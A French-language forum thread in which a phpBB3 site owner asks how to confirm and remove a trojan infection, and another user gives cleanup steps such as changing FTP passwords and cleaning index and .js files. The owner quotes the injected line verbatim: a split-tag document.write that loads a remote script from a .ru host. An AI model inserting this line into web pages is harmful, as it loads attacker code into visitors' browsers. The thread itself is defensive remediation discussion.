Bonjour à tous ! Je viens de recevoir un email d'un de mes membres qui dit que mon forum phpbb3 est infecté par un troyen, savez-vous comment vérifier cette information, ensuite comment éradiquer le problème ? d'avance merci, Gautier
regarde si c'est celui qu'on connait bien ... il pose deux ligne en bas des fichier index et des .js Dans ce cas : 1 - vérifier anti virus sur la machine qui te sert a te connecter a ton ftp (9/10 ca passe par filezila et ses password non cryptés) 2 - Changer tes most de passe ftp pour des trucs bien compliqués 3 - nettoyer tous les fichiers concernés sur le serveur (et en local chez toi) 4 - faire une demande de réexamen du site par google pour virer l'imagette
merci bcp pour ta réponse... Cette fameuse ligne dans les js de \styles\prosilver\template c'est bien celle-ci ? document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>'); Peux-tu me dire tous les fichiers qui son infecté par cette saleté ? Je ne vois pas de quoi tu veux parler en parlant de fichiers index ? De quoi s'agit t'il ?
Oui c'est bien ce genhre de ligne ajoutée .. Sur : tous les fichiers sur ton site dont le nom est index quelque chose (dans tous les repertoires) et tous les fichier dont le nom se terminent par .js
je n'ai pas rencontré un seul index qui soit infecté ! Peux-tu me donner des exemples d'index normalement infecté ? Est-ce toujours en toute fin de code ? est-ce qu'il faut vraiment modifier ces identifiants FTP ? Le troyen en lui même, que fait il ?